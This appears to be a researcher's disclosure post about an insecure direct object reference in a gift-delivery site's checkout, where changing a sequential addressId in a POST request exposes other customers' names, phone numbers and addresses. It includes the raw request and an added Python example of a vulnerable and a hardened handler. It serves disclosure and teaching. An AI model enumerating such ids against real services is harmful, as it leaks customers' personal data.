Buying A Gift Can Cost You Your PII Data


Almost a year ago I reported a PII data leak to the Winni Bug Bounty Program.

After 20+ follow-up emails, I am disclosing the issue, though the Winni team fixed it silently without responding.

The issue is a pretty straightforward IDOR (insecure direct object reference).

Winni delivers cakes and gifts to your loved ones. While placing an order, before payment, it asks for the address.

When an address is selected, a POST request is made to fetch the address referenced by addressId.



    POST /checkout/adv/address/select-previous HTTP/1.1
    Host: winni.in
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101   
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 16
    Origin: winni.in
    Connection: close
    Referer: winni.in/checkout/adv/address
    Cookie: AWSALBTG=XXX

    addressId=685945

Altering the addressId value returns another user's address along with their name and phone number.

Because addressId is sequential, an attacker can fetch every address available in the database, which results in a mass PII leak including names, phone numbers and addresses.
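The missing check and its fix, as an added example that is not Winni's code and not from the original report: the table layout, function names and sample records are assumptions made for illustration. The first handler looks the address up by the client-supplied id alone; the second scopes the query to the session's user and answers "not found" and "not yours" identically.

```python
import sqlite3

def make_db():
    # Constructed sample data: two users, each with one saved address.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE address (id INTEGER PRIMARY KEY, user_id INTEGER,"
               " name TEXT, phone TEXT, line1 TEXT)")
    db.executemany("INSERT INTO address VALUES (?, ?, ?, ?, ?)", [
        (1001, 1, "Alice Example", "555-0100", "1 Sample Street"),
        (1002, 2, "Bob Example", "555-0101", "2 Sample Street"),
    ])
    return db

def _row_to_dict(row):
    if row is None:
        return None
    return dict(zip(("id", "name", "phone", "line1"), row))

def select_previous_vulnerable(db, session_user_id, address_id):
    # Looks the record up by the client-supplied id only; the session
    # user is never consulted, so any valid id returns its owner's PII.
    row = db.execute("SELECT id, name, phone, line1 FROM address WHERE id = ?",
                     (address_id,)).fetchone()
    return _row_to_dict(row)

def select_previous_hardened(db, session_user_id, address_id):
    # Reject non-numeric input, then scope the query to the session user.
    # "Not found" and "not yours" both return None (map it to one 404),
    # so responses do not confirm which ids exist.
    try:
        address_id = int(address_id)
    except (TypeError, ValueError):
        return None
    row = db.execute("SELECT id, name, phone, line1 FROM address "
                     "WHERE id = ? AND user_id = ?",
                     (address_id, session_user_id)).fetchone()
    return _row_to_dict(row)

if __name__ == "__main__":
    db = make_db()
    print(select_previous_vulnerable(db, 1, 1002))  # user 2's record leaks
    print(select_previous_hardened(db, 1, 1002))    # None
    print(select_previous_hardened(db, 1, 1001))    # user 1's own record
```

The session user id must come from the authenticated server-side session, never from a request parameter.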

POC

PS: Don't waste your time reporting to their bug bounty program.

Thanks for reading. Any suggestions or feedback are welcome.